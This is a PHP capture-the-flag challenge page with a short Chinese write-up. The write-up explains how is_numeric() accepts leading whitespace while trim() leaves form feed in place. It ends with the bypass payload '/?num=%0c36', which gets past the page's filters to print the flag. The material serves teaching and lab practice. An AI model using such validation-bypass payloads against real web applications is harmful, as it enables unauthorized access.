<?php
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-01 15:08:19
*/
// Pulls in the secret; presumably flag.php assigns $flag, which the success branch echoes below.
include('flag.php');
// Source disclosure is intentional for this challenge: the page prints its own code.
highlight_file(__FILE__);
// Suppress warnings (for example a missing ?num= parameter) so only the branch text reaches the response.
error_reporting(0);
/**
 * Deny-list rewrite applied to the submitted value before the "36" comparison.
 *
 * Every occurrence of "0x", "0", ".", "e" and "+" is replaced by "1", in that
 * order, so hexadecimal, leading-zero, decimal-point and exponent spellings of
 * 36 no longer rewrite to "36". This is a rewrite, not validation: any
 * character outside that list passes through untouched.
 *
 * @param mixed $num raw request value (str_replace accepts a string or an array of strings)
 * @return mixed the rewritten value
 */
function filter($num){
    // str_replace applies a search list sequentially, which is exactly the
    // chain of single replacements the original performs one call at a time.
    $blocked = ['0x', '0', '.', 'e', '+'];
    return str_replace($blocked, '1', $num);
}
// A value only reaches the final comparison if is_numeric() accepts it, it is
// not literally "36" (even after trim), and filter() still rewrites it to "36".
$num = $_GET['num'];
$passesChecks = is_numeric($num)
    && $num !== '36'
    && trim($num) !== '36'
    && filter($num) == '36';

if (!$passesChecks) {
    echo "hacker!!!";
} elseif ($num == '36') {
    // Loose comparison: two numeric strings are compared by numeric value here.
    echo $flag;
} else {
    echo "hacker!!";
}
// Page output for a request without a qualifying num: hacker!!!
在数字前加上空白字符(空格、\n、\t、\f、\r、\v),也会被is_numeric函数认为是数字:
<?php
// Several kinds of leading whitespace are accepted by is_numeric();
// each sample below dumps bool(true).
$samples = [
    "\n1",
    "\t1",
    "\f1",
    "\r1",
    "\v1",
    " 1",
];
foreach ($samples as $sample) {
    var_dump(is_numeric($sample));//bool(true)
}
trim函数会过滤空格以及\n\r\t\v\0,但不会过滤\f
<?php
// trim()'s default character list is " \n\r\t\v\0"; the form feed (\f) is not
// in it, so it survives while the other leading/trailing whitespace is removed.
$sample = " \n\r\t\v\0 aaa \f";
var_dump(trim($sample));//aaa \f
?>
payload:
/?num=%0c36